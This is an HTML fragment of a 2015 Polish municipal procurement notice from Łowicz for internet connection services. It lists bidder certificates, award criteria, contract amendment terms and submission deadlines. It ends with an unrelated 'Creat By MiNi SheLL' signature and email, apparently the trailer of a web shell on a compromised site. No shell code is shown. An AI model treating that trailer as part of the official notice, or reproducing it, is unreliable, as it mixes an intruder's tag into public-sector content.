<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane usługi, o których mowa w pkt 1-2 odpowiadają wymaganiom określonym przez Zamawiającego, o których mowa w Załączniku               Nr 1 do Specyfikacji Istotnych Warunków Zamówienia, wymaga się dostarczenia wraz ofertą dokumentów w postaci opisów oferowanych elementów złącza internetowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Transfer danych do koputera (down) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy mogą nastąpić jedynie w formie pisemnej pod 	rygorem nieważności.
2.	Zmiana postanowień niniejszej umowy może nastąpić jedynie w razie zaistnienia 	następujących okoliczności:
1)	klęski żywiołowe,
2)	inne warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonywanie przedmiotu niniejszej umowy, 
3)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością wykonywanie przedmiotu niniejszej umowy,
3.	W przypadkach, o których mowa w ust. 2:
1)	Wykonawca nie ponosi odpowiedzialności za szkody wynikające z opóźnienia                       lub niewykonania jego zobowiązań wynikających z niniejszej umowy,
2)	Wykonawca zobowiązany będzie prowadzić te czynności, których realizacja                        nie  podlega  ograniczeniom  wynikającym  z  przypadków,  o  których mowa w ust. 2,  
	chyba że Zamawiający uzna, iż prawdopodobne jest tylko częściowe wykonanie 	czynności, które będą dla niego nieprzydatne,
3)	Wykonawca zobowiązany jest uzgodnić z Zamawiającym, czy i jakie alternatywne środki są możliwe do zastosowania w celu prowadzenia czynności objętych niniejszą umową w przypadkach, o których mowa w ust. 2 oraz zobowiązany jest                      do podjęcia działań uzgodnionych w tym zakresie przez obydwie strony.
4.	W razie zmiany:
1)	stawki podatku od towarów i usług,
2)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2         ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. z 2002 r. Nr 200, poz. 1679 z późn. zm.),
3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu                   lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,
jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę przedmiotu niniejszej umowy, każda ze stron niniejszej umowy, w terminie 30 dni od dnia wejścia                w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony                           o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lowicz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Łowicz, Pl. Stary Rynek 1, 99 - 400 Łowicz, woj. Łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2015 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Łowiczu, Pl. Stary Rynek 1, budynek A, pok. 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com